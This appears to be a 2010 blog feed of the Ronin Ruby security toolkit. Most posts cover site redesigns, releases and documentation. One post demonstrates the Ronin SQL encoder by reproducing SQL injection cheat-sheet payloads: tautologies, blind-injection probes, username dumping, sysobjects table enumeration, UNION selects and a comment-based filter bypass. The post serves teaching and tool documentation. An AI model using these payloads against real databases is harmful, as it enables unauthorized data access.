Graphic (SVG)</a> using <a href="http://inkscape.org/">Inkscape</a>. The menu was also recreated as a SVG, complete with embedded links for the menu items.</p> <p>Now the website should properly scale without pixelation. The SVGs should render correctly in:</p> <ul> <li><a href="http://www.mozilla.org/en-US/firefox/fx/">Firefox</a> >= 4</li> <li><a href="http://www.google.com/chrome">Chrome</a> >= 11</li> <li><a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home">IE</a> 9</li> </ul> <p>Opera has known issues with rendering inline SVGs. It goes without saying, the website will not render correctly in IE 6. :)</p> <h2>Blueprint CSS</h2> <p>I also added <a href="http://www.blueprintcss.org/">Blueprint CSS</a> to the website, which should fix any cross-browser CSS bugs and improve Typography. Blueprint also assumes the maximum page width of 960 pixels, which allows for more content to be displayed.</p> <h2>Page Moves</h2> <p>Finally, the content was regrouped into four main sections:</p> <ul> <li><a href="/blog/">blog</a> - Project Blog.</li> <li><a href="/faq/">faq</a> - Frequently Asked Questions.</li> <li><a href="/docs/">docs</a> - Information for Users.</li> <li><a href="https://github.com/ronin-ruby/">code</a> - Ronin repositories on GitHub.</li> </ul> <p>Not to worry, the <a href="/sitemap.xml">sitemap</a> was updated and JavaScript redirects were added to the old pages.</p> <h2>Bugs</h2> <p>If the site is not rendering correctly for you, or maybe you found a typo, you can <a href="https://github.com/ronin-ruby/ronin-ruby.gihtub.io/issues">submit a bug</a> or <a href="https://github.com/ronin-ruby/ronin-ruby.gihtub.io">fork/edit the site</a> on <a href="https://github.com/signup/free">GitHub</a>.</p> Thu Dec 30 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/12/30/ronin-1-0-0-prerelease.html <p>After more than a year of development, refactoring and new features, Ronin 1.0.0.pre1 has been released:</p> <pre><code>$ gem install ronin --pre </code></pre> <p>Since this is a prerelease, QA testing and <a href="https://github.com/ronin-ruby/ronin/issues">bug reports</a> would be much appreciated. As bug-fixes stack up, we will release additional prereleases for testing. Once the code stabilizes, Release Candidates (RCs) will be released.</p> <p>Instead of trying to release everything at once, we are following a staggered <a href="https://github.com/ronin-ruby/ronin/wiki/Release-Schedule">Release Schedule</a> split into in three phases. This allows us to get the core libraries (<a href="https://github.com/ronin-ruby/ronin-support#readme">ronin-support</a>, <a href="https://github.com/ronin-ruby/ronin#readme">ronin</a> and <a href="https://github.com/ronin-ruby/ronin-gen#readme">ronin-gen</a>) immediately to users.</p> Wed Sep 01 00:00:00 -0700 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/09/01/new-api-documentation.html <p>If you have not heard yet, <a href="http://gnuu.org/">lsegal</a> and <a href="http://blog.zerosum.org/">zapnap</a> have rolled out the new <a href="http://rubydoc.info/">rubydoc.info</a> running <a href="http://rubydoc.info/docs/yard/file/docs/WhatsNew.md">YARD 0.6.0</a>.</p> <p>Not only does <code>rubydoc.info</code> look sharp, but it can build YARD documentation for both <a href="http://rubydoc.info/gems/">RubyGems</a> released to <a href="http://rubygems.org/">rubygems.org</a> or <a href="http://rubydoc.info/github/">GitHub</a> repositories being actively developed.</p> <p>We immediately leveraged <code>rubydoc.info</code> by making sure all Ronin repositories had post-receive hooks to update their YARD documentation. Now users can browse API documentation for both <a href="http://rubydoc.info/github/ronin-ruby/ronin/master/frames">Ronin (Edge)</a> and previous releases of <a href="http://rubydoc.info/gems/ronin/frames">Ronin</a>.</p> <p>Checkout the new API documentation links in the <a href="/docs/">docs</a> section.</p> Thu Aug 19 00:00:00 -0700 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/08/19/installing-ronin-edge-guide.html <p>We just released a new <a href="/docs/install/edge.html">tutorial</a>, aimed at developers and users who want to run the latest changes made to Ronin.</p> <p>The Guide also touches on using the <a href="http://rvm.beginrescueend.com/">Ruby Version Manager (RVM)</a> to install Ruby and using <a href="http://www.gembundler.com/">Gem Bundler</a> to install the dependencies of Ronin. Together, RVM and Gem Bundler, allows you to easily run the edge version of Ronin right out of your home directory!</p> Mon Feb 22 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/02/22/new-site.html <p>As listed in the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a>, a new website has been designed for <a href="/">Ronin</a>. The new site is <a href="https://github.com/mojombo/jekyll#readme">Jekyll</a> based and hosted on <a href="https://github.com/ronin-ruby/ronin-ruby.gihtub.io#readme">GitHub</a>.</p> <p>Much of the website is written in <a href="http://daringfireball.net/projects/markdown/">Markdown</a>, which makes writting new content a breeze. As always, we accept edits to the site, simply <a href="https://github.com/ronin-ruby/ronin-ruby.gihtub.io/fork">fork</a> the site, commit your changes and send one of the Ronin developers a pull-request.</p> <p>You'll probably notice that we also added a few new sections to the site. The <a href="/">front page</a> now shows three random examples pulled from the <a href="/examples/">Examples</a> section, illustrating some of the things Ronin can do in a few lines. One can even subscribe to an <a href="/examples/atom.xml">Atom feed</a> of the Examples, to get the latest tricks.</p> <p>The <a href="/downloads/">Downloads</a> link in the menu now points to an actual downloads page, containing links to <code>.tar.gz</code>, <code>.zip</code> and <code>.gem</code> files of Ronin.</p> <p>Lastly, Ronin now has a <a href="/blog/">Developer Blog</a> with <a href="http://disqus.com/">DISQUS</a> powered comments.</p> Fri Feb 05 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/02/05/rsnakes-sqli-cheat-sheet-using-ronin-sql.html <p>One of the planned features listed in the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a> was a simple Ruby->SQL encoder for the <a href="https://github.com/ronin-ruby/ronin-sql#readme">Ronin SQL</a> library, to replace the overly complex Ronin SQL DSL. This encoder would format Ruby Integers, Strings, Arrays and Hashes into fragments of proper SQL.</p> <p>The Ruby->SQL encoder has gotten to the point of being able to recreate most of the examples from <a href="http://ha.ckers.org/sqlinjection/">RSnake's SQL Injection Cheat Sheet</a>:</p> <p>Load <code>ronin/code/sql</code>:</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/code/sql&#39;</span> <span class="kp">include</span> <span class="no">Ronin</span> <span class="n">sql</span> <span class="o">=</span> <span class="no">Code</span><span class="o">.</span><span class="n">sql</span> </code></pre></div> <p>Normal SQL Injection:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:or</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="mi">1</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 or 1 = 1&quot;</span> </code></pre></div> <p>Normal SQL Injection using encapsulated data:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="s1">&#39;1&#39;</span><span class="p">,</span> <span class="ss">:or</span> <span class="s1">&#39;1&#39;</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;&#39;1&#39; or &#39;1&#39; = &#39;1&#39;&quot;</span> </code></pre></div> <p>Blind SQL Injection creating an error using EXEC:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:exec</span><span class="p">,</span> <span class="ss">:sp_</span><span class="p">,</span> <span class="o">[</span><span class="n">sql</span><span class="o">[</span><span class="ss">:or</span><span class="p">,</span> <span class="ss">:exec</span><span class="p">,</span> <span class="ss">:xp_</span><span class="o">]]].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 exec sp_ (or exec xp_)&quot;</span> </code></pre></div> <p>Blind SQL Injection detection:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="mi">1</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 and 1 = 1&quot;</span> </code></pre></div> <p>Blind SQL Injection to attempt to locate <code>table_name</code> by brute-force iteration through table name permutations:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="s1">&#39;1&#39;</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="o">[</span><span class="n">sql</span><span class="o">[</span><span class="ss">:select</span><span class="p">,</span> <span class="n">sql</span><span class="o">.</span><span class="n">count</span><span class="p">(</span><span class="ss">:all</span><span class="p">),</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:table_name</span><span class="o">]]].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;&#39;1&#39; and 1 = (select count(*) from tablenames)&quot;</span> </code></pre></div> <p>Using the <code>USER_NAME()</code> function in SQL Server to tell us if the user is running as the administrator:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="n">sql</span><span class="o">.</span><span class="n">user_name</span><span class="p">(),</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">&#39;dbo&#39;</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 and user_name() = &#39;dbo&#39;&quot;</span> </code></pre></div> <p>Creating errors by calling non-existant tables:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="ss">:non_existant_table</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 and non_existant_table = &#39;1&#39;&quot;</span> </code></pre></div> <p>Dumping usernames:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="ss">:or</span><span class="p">,</span> <span class="ss">:username</span><span class="p">,</span> <span class="ss">:is</span><span class="p">,</span> <span class="ss">:not</span><span class="p">,</span> <span class="kp">nil</span><span class="p">,</span> <span class="ss">:or</span><span class="p">,</span> <span class="ss">:username</span><span class="p">,</span> <span class="ss">:eq</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;or username is not null or username =&quot;</span> </code></pre></div> <p>Enumerating through database table names:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="n">sql</span><span class="o">.</span><span class="n">ascii</span><span class="p">(</span> <span class="n">sql</span><span class="o">.</span><span class="n">lower</span><span class="p">(</span> <span class="n">sql</span><span class="o">.</span><span class="n">substring</span><span class="p">(</span> <span class="o">[</span><span class="n">sql</span><span class="o">[</span><span class="ss">:select</span><span class="p">,</span> <span class="ss">:top</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:name</span><span class="p">,</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:sysObjects</span><span class="p">,</span> <span class="ss">:where</span><span class="p">,</span> <span class="ss">:xtype</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">&#39;U&#39;</span><span class="o">]]</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span> <span class="p">)</span> <span class="p">),</span> <span class="ss">:gt</span><span class="p">,</span> <span class="mi">116</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 and ascii(lower(substring((select top 1 name from sysobjects where xtype = &#39;U&#39;),1,1))) &gt; 116&quot;</span> </code></pre></div> <p>Finding user supplied tables using the <code>sysObjects</code> table in SQL Server:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:union</span><span class="p">,</span> <span class="ss">:all</span><span class="p">,</span> <span class="ss">:select</span><span class="p">,</span> <span class="o">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="ss">:name</span><span class="o">]</span><span class="p">,</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:sysObjects</span><span class="p">,</span> <span class="ss">:where</span><span class="p">,</span> <span class="ss">:xtype</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">&#39;U&#39;</span><span class="o">].</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 union * select (1,2,3,4,5,6,name) from sysObjects where xtype = &#39;U&#39;&quot;</span> </code></pre></div> <p>Bypassing filter using <code>/**/</code> instead of spaces:</p> <div class="highlight"><pre><code class="ruby"><span class="n">stmt</span> <span class="o">=</span> <span class="n">sql</span><span class="o">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:union</span><span class="p">,</span> <span class="ss">:select</span><span class="p">,</span> <span class="ss">:all</span><span class="p">,</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:where</span><span class="o">]</span> <span class="n">stmt</span><span class="o">.</span><span class="n">to_sql</span> <span class="c1"># =&gt; &quot;1 union select * from where&quot;</span> <span class="n">stmt</span><span class="o">.</span><span class="n">to_sql</span><span class="p">(</span><span class="ss">:spaces</span> <span class="o">=&gt;</span> <span class="kp">false</span><span class="p">)</span> <span class="c1"># =&gt; &quot;1/**/union/**/select/**/*/**/from/**/where&quot;</span> </code></pre></div> <div class="note"> <p> I cheated a little by leaving off the prefix/suffix tick-marks used in SQL injections, but you get the general idea. </p> </div> <p>New SQL fragments are created using the <code>sql[...]</code> syntax, and new SQL function calls are created with <code>sql.func_name</code>. Note, that you can nest SQL fragments by using the <code>[sql[...]]</code> or <code>[sql.func_name(....)]</code> syntax.</p> Thu Feb 04 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/02/04/introducing-ronin-support.html <p>One of the things that recently came up during the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a> was that the <a href="https://github.com/ronin-ruby/ronin#readme">ronin</a> repository had become heavy with convenience methods. So it was decided to split the convenience methods out of the ronin repository, and create a new Ronin library just for support code.</p> <p>Introducing <a href="https://github.com/ronin-ruby/ronin-support#readme">ronin-support</a>, a support library for Ronin. ronin-support contains many of the convenience methods used by Ronin and additional libraries. The ronin-support library also allows other projects to leverage Ronin convenience methods, without needing the other dependencies of Ronin.</p> Fri Jan 29 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/01/29/official-github-account.html <p>While working on the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a>, I noticed that Ronin had grown to 12 repositories. Being such a large and established project, I realized it was high time to create an official GitHub account to host the Ronin repositories.</p> <p>From now on, the source for all Ronin repositories is <a href="https://github.com/ronin-ruby/">github.com/ronin-ruby</a>.</p> Tue Jan 12 00:00:00 -0800 2010 postmodern http://ronin-ruby.gihtub.io/blog/2010/01/12/spring-cleaning.html <p>During the end of 2009 I ended up taking a break from working on Ronin, and shifted my efforts to other projects. Once 2009 came to a slow grinding halt and made way for 2010, I decided to come back to Ronin and not let it fall into disrepair. I and other Ronin developers compiled a list of the radical changes we felt were necessary, in order to keep Ronin relevant. Thus the <a href="http://groups.google.com/group/ronin-ruby/browse_thread/thread/d01f1fb4460d4b22#">Spring Cleaning Campaign</a> of 2010 was started.</p>